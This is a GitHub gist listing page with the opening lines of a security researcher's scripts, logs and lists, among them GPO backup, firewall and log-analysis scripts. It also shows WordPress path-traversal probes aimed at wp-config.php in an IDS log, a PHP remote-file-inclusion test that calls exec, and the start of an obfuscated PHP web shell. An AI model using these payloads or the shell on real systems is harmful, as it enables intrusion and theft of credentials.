felmoltor
/ Backup-GPOs.ps1
Created
October 6, 2015 09:28
Powershell script to backup a domain gpo list
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Date: 10-2015 | |
| # Author: Felipe Molina (@felmoltor) | |
| # Summary: Authomatize the backup proccess of GPO for a domain. | |
| # Create a folder with the time when this script was executed and inside it a folder for each GPO of the domain | |
| # The program needs two mandatory parameters: | |
| # * Domain: The domain from where we want to backup the GPOs | |
| # * backuppath: The path to the folder where we want to store this backups | |
| param( | |
| [Parameter(Mandatory=$True,Position=1)][String]$domain, |
felmoltor
/ wordpress.scan.detected.txt
Created
August 4, 2015 07:30
[IDS] Detected wordpress vulnerability scans
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 03/12/2015 37.187.238.74 403 /$wp-content$/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download | |
| 03/12/2015 37.187.238.74 403 /$wp-content$/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download | |
| 03/12/2015 37.187.238.74 403 /$wp-content$/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download | |
| 03/12/2015 37.187.238.74 403 /$wp-content$/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php | |
| 03/12/2015 37.187.238.74 403 /$wp-content$/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php | |
| 03/12/2015 37.187.238.74 403 /$wp-content$/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php | |
| 03/12/2015 37.187.238.74 403 /$wp-content$/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php | |
| 03/12/2015 37.187.238.74 403 /$ |
felmoltor
/ find.facebook.usernames.sh
Created
June 1, 2015 18:38
AFF nicks find in facebook and twitter
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| if [[ $1 == "" ]];then | |
| echo "Provide a file with the usernames" | |
| exit | |
| fi | |
| if [[ $2 == "" ]];then | |
| echo "Provide a file with the facebook cookie" | |
| exit |
We can make this file beautiful and searchable if this error is corrected: No commas found in this CSV file in line 0.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Abengoa;abengoa.com | |
| Abertis;abertis.com | |
| Acciona;acciona.com | |
| ACS;grupoacs.com | |
| Amadeus;amadeus.com | |
| ArcelorMittal;arcelormittal.com | |
| Banco Popular;bancopopular.es | |
| Banco Sabadell;bancsabadell.com | |
| Banco Santander;bancosantander.es | |
| Bankia;bankia.com |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1549773 yahoo.com | |
| 1261928 hotmail.com | |
| 881650 gmail.com | |
| 228439 aol.com | |
| 91586 live.com | |
| 57248 breakthru.com | |
| 49750 msn.com | |
| 45566 comcast.net | |
| 45228 ymail.com | |
| 34887 hotmail.fr |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import os,sys | |
| if len(sys.argv) < 3: | |
| print "Usage: %s <source file> <percentage>" % sys.argv[0] | |
| exit(1) | |
| if not os.path.exists(sys.argv[1]): | |
| print "Provide a file from wich to extract the sample" |
felmoltor
/ close.firewall.sh
Last active
August 29, 2015 14:21
Open Dev environment to SSH authenticated user
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Close the remaining firewall rules opened for users that no longer are connected by SSH | |
| # It deletes the iptables rules execpt the ssh (port 22) and all the local connections | |
| # Save this script and execute it as root with a crontab every 5 minutes. | |
| # Example output of iptables -L -n: | |
| # ACCEPT tcp -- 11.22.33.44 0.0.0.0/0 tcp dpt:80 | |
| # ACCEPT tcp -- 11.22.33.44 0.0.0.0/0 tcp dpt:443 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // echo "Testing RFI success!"; | |
| $e = ''; | |
| exec("touch ./bbbbbbbb.txt",$e); | |
| ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $language = 'eng'; | |
| $auth = 0; | |
| $name = ''; // md5 Login | |
| $pass = ''; // md5 Password | |
| /**************************************************************************************************************************************************************/ | |
| error_reporting(0); | |
| $rhs = '7b17e9pVsjj89+Rs8h0UHZ8BJhgjLr4Gj++OnfgS3+I4yW4FEqAYECOBejKb97O/SNXdResK2M7u7P7GuxOgu7q6urqquvpNpuPYQd0xB7YztPrteTG39vLFhtW3IM0d2o6ZSF29ctZ7tm6q0Tx7YPbrDd01DctERorWrX6zO4LPVmPmg9lZADIsSmJnzW141GIOLbvvxsDo3a59Xx853W0LVvMhXGaYzZjU2K7dzuSPL9+/D3NPZZ0A3FmeuDA30IcdpabM1c9qz65pzz50aUG2L49pjy/qdCcnF5mvhcxPpoDlHgrDh24Gi0uDQIGz3aOTi9365s7OTObrmrKwYA0AqOHY967pBCDfXlyc1i/hSn1mH3dg0BwQikCLT4g/XO6eX9Qvzw4YKAAAmKGPAczQh3M243FlmAFWkKE3h2qE4PTk/OJmptkzSzH9aXXdTFDdBZim3R+a/SGAqS9fvHyxo49/+XJImSMEB6f0Hcnfb1HRYo/AWKdYCVHGe90dKttpr6f3DVnEyl++qP+MPxWZDswHoqnDs9R2bEh/Wl3fumos4AVP5BXRQMp1aXqXcuBCq5XNvtoQggVPdblQN5tO2XWbw1kup/zzn1dpg//Oc3Gxz+SUSjWF5CkEFSv9Emvu5Ys/lTkZFzRQW0Z+KHPXNZV1XhHygNqF3/7SfwsvXxhzy+qjXg9odDi0baaa3wCW9KymcOPPeQ65DndK7+l6q0z/cH |
felmoltor
/ analyze.new.logs.sh
Last active
September 24, 2020 09:37
OVH Apache Access log periodic download
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Author: Felipe Molina (@felmoltor) | |
| # Date: 05/03/2015 | |
| # Summary: | |
| # This script analyzes the Apache logs previously downloaded with "download.ovh.logs.sh" | |
| # It compares the requests done yesterday with the whitelist of files of the website contained in "whitelist.files.list" | |
| # If one of the requests is not pressent in this whitelist, the script stores it as suspicious along with the server response | |
| # of the request and finally a summary is sent to your email. |